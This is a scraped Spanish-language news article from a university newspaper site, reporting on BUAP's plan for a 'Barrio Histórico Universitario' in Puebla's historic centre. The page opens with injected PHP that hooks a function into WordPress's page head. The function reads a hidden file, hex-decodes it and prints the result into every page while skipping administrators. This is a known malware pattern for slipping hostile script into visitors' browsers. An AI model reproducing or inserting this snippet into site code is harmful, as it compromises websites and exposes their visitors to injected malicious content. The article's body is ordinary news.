if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Anuncia AEO que 24 unidades universitarias se mantendrán en el Barrio Histórico Universitario – La Opinión Universitaria La Opinión Universitaria
Menu

Anuncia AEO que 24 unidades universitarias se mantendrán en el Barrio Histórico Universitario

 

+ La Buap mantiene edificios de alto contenido histórico

Por Diego Cuautle

Con el objetivo de preservar y recomponer el paisaje histórico, el rector de la Benemérita Universidad Autónoma de Puebla (BUAP), Alfonso Espera Ortiz, presentó el proyecto denominado Barrio Histórico Universitario el cual toma como punto de partida indicadores internacionales.

Lo anterior en el marco de la primera Jornada Iberoamericana de Universidades en Centros Históricos Patrimoniales que se lleva a cabo en la capital poblana, donde destacó que se busca readecuar usos y funciones de los inmuebles catalogados por el Instituto Nacional de Antropología e Historia (INAH) que están sujetos a los avatares sísmicos de la ciudad.

Agregó que se enfocarán en tres corredores denominados «Carolino», «Casa de la Reina» y «San José», los cuales tienen que ver con 58 manzanas y 144 calles del Centro Histórico de Puebla.

Además el BHU plantea la reubicación de 24 unidades administrativas que actualmente funcionan en edificios del centro histórico para reorientar la vocación educativa de los edificios.

Explicó que el muevo barrio permitirá satisfacer necesidades concretas de preservación del patrimonio a través de la creación de un centro de bienes muebles y artes decorativas, un laboratorio de arqueología urbana, un centro metropolitano de la cultura y las artes populares, y un centro universitario de la cultura y los saberes en el edificio Carolino.

Esparza Ortiz recordó que el BHU fue presentado ante el Consejo Universitario, es un proyecto impulsado por la Vicerrectoría de Extensión y Difusión de la Cultura, a través de la Dirección del Patrimonio Histórico Universitario que encabeza la investigadora Rosalva Loreto López.

Pretende mediante la adecuación de edificios históricos, aplicar metodologías y tecnologías que los hagan edificios sustentables con el objeto de proporcionar seguridad y bienestar social.

Por su parte, Rosalva Loreto explicó que se pretende revisar qué ha pasado con los centros históricos que hace más de 30 años están en la lista de Patrimonio de la Humanidad de la Unesco, como es el caso del Centro Histórico de Puebla, incluido en 1989.

  • No comments

    Deja una respuesta

    Tweets recientes